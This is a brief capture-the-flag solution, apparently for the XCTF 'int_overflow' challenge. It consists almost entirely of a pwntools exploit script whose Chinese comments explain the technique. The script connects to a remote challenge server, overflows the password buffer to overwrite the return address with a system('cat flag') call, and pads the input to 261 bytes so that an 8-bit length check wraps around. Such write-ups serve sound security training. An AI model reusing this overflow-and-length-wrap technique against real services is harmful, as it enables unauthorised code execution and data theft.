int_overflow
exp.py:
#!/usr/bin/env python
from pwn import *
sh = remote("124.126.19.106",42438)
flag_addr=0x08048694
payload = 'A'*0x14 + 'AAAA' + p32(flag_addr) + 'a'*(256-0x14-4-4+5)
#‘A’*0x14是溢出到ebp
#'AAAA'是之前pop过一次,出栈操作还存着一个ebp地址
#flag_addr是调用system('cat flag')的调用地址
#256+5是为了绕过他的<3u || >8u就报错的分支,-0x14-4-4分别是减去溢出代码、'AAAA'、flag_addr之后补全这么多个空字符
sh.sendlineafter("choice:","1")
sh.sendlineafter("username:\n","xctf")
sh.sendlineafter("passwd:\n",payload)
print sh.recvall()